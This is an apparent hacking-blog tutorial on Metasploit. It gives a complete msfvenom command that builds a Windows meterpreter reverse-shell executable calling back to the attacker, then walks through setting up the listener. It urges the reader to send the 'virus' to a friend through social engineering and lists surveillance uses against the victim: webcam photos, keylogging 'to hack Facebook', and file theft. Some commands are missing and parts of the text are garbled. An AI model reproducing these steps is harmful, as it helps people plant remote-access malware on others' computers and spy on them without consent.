You are here
Kali Linux training>Chapter 6
In this post, we will talk about the Metasploit framework. I am sure you have enough heard about Metasploit and maybe still confuse what is this and how to use it?
It is framework mean it is the collection of a number of exploits.
You can gather information, make malware, hack FTP, hack Android, and many other things. You will know when you use it.
It is pre-installed in Kali or parrot OS. It has paid and free version. Off course, Kali has a free version. Not only in Kali you can install it in the window too.
Metasploit is also integrated with nmap you can use nmap inside the Metasploit no need to open a new terminal. In this post, I will tell you how to use Metasploit and gather information of my server. After this will be able to understand to Metasploit commands of other tutorials and very soon able to make your tutorial.
Before getting start, you need to know some terms like an exploit, payload, etc.
What is exploit?
In Metasploit exploit is exploit. If you installed the reverse shell correctly on the target machine, then you can explore the system with the help of exploit. By default there 1590 exploits available in Metasploit. I also link a post at the which will show how to add own exploit in Metasploit.
The payload is a piece of code which can we used to hack the system and exploit help you to do whatever want to you do with hacked machine. This helps you to create a virus.
According to offensive-security msfencode is another great little tool in the framework’s arsenal when it comes to exploit development. Most of the time, one cannot simply use shellcode generated straight out of msfpayload. It needs to be encoded to suit the target in order to function properly. This can mean transforming your shellcode into pure alphanumeric, getting rid of bad characters or encoding it for the 64-bit target.
Important Network terms
LHOST: lhost is attacker ip address
LPORT: it is port number that you want to use
RHOST: This is ip address of victim machine
RPORT: Port number of the victim.
Ok, let’s start with Metasploit. I will advise you not to copy command if you want to become a master.
Open your terminal and type
service postgresql start
it helps your run Metasploit smoothly.
it will launch Metasploit. It will take some time because it has the number of exploits.
To see exploits type
it will show all the exploit. In front of every exploit, you can see description [uses] of that exploit.
I am going to gather information about my website server. For this, we need to use ssh version exploit. Type
As you can see it show exploits related to ssh_version.
I am going to use ssh_version_15 so here are commands [ type use exploit name for use any exploit ]
Your next command is type show options.
As you can see we need to set RHOST. I have already informed you of RHOST mean target ip address. we need to scan my website for getting the IP address. As I told you above nmap is integrated with Metasploit. Here are nmap commands for scanning.
nmap –A opentechinfo.com –p 22 -vv
In above command –A specific hostname and –p for the port because there are 65000 ports For scanning all ports It will take a lot of time but ssh use 22 port. So I already specify it for saving your time.
As you can see my ip address is 126.96.36.199 and my port is filtered which mean closed assume it. In the case of closed, it will not work, but I don’t have the permission of any other website, So I am using it.
Set RHOST 188.8.131.52
Now type run it will show you os.
As I told you above my port is close so will not work. Don’t be sad it will work on any other website which has 22 open port.
Now you have basic knowledge of Metasploit Let’s do something real with Metasploit I mean create a virus for window os.
Hacking window OS with Metasploit
Open your terminal and type msfvenom. It will show you system of creating a virus.
Msfconsle will load only exploits, but msfvenom will load exploits with encoding. Hope you read payload definition in above of the post.
msfvenom –p windows/meterpreter/reverse_tcp –f exe –a x86 –platform windows LHOST=192.168.174.192 LPORT=4444 –o santy.exe
- Ok, let me explain these commands
- -p set the payload.
- -f exe mean file type or file extension should be exe
- -a x86 mean system architecture. x86 is used for 32 bit although my system is 64 bit, we can run 32-bit program on 64 bit.
- –platform windows mean this virus for window os
- -LHOST and LPORT are already explained. To know your LHOST type ifconfig. Note use only working interface Ip address.
- -o is the path for saving file with the name because I want to save it in the root directory, So I typed the only file name.
Note: type these arguments as I typed if you replace the position of any arguments then Metasploit unable to create the virus.
Here is what you get if you typed this command successfully. Output will be saved in working direcotry.
Next command is type
Now you have to set payload
Set PAYLOAD windows/meterpreter/reverse_tcp
payload should be same which you should use to create malware program.
Your LHOST is your ip address you know how to set it. If you don’t know your ip address open new tab press shift+ctrl+ t to open a new tab and type ifconfig it will show your local Ip address.
In my case, it is 192.168.174.129 your ip should be similar to it but not name.
Set LHOST 192.168.174.129
Set LPORT 4444
Type exploit or run. Both meaning is same.
Now just send this virus to your friend. Use your social engineering skills.
In my case I am using VMware, so I just copy paste it into my window 10 host machine.
When victim runs this program, you will season open in Metasploit and meterpreter will start as shown in the screenshot.
This means you have hacked victim machine Successfully. Here is some important following operation that you can do with victim machine.
- Can take pictures from webcam or record live video
- Records keystroke ( keylogger )
- Download or upload files to the victim machine.
- Shutdown or restart Computer.
Above are only few example type help to know what and how you can with victim computer. Type help to know what you can do with the hacked machine.
For taking webcam picture type
Here is my photo was taken by the camera.
To record keystroke type start keyscan_start and after sometime key_scan_stop To view keyscan_demp. Keylogger is an excellent way to hack Facebook
As shown in help menu you can also upload or download files or browse directories.
OK, Hope you have learned something new in this post. Here is some relevant Metasploit tutorial from others blogs I advise you to read all these posts.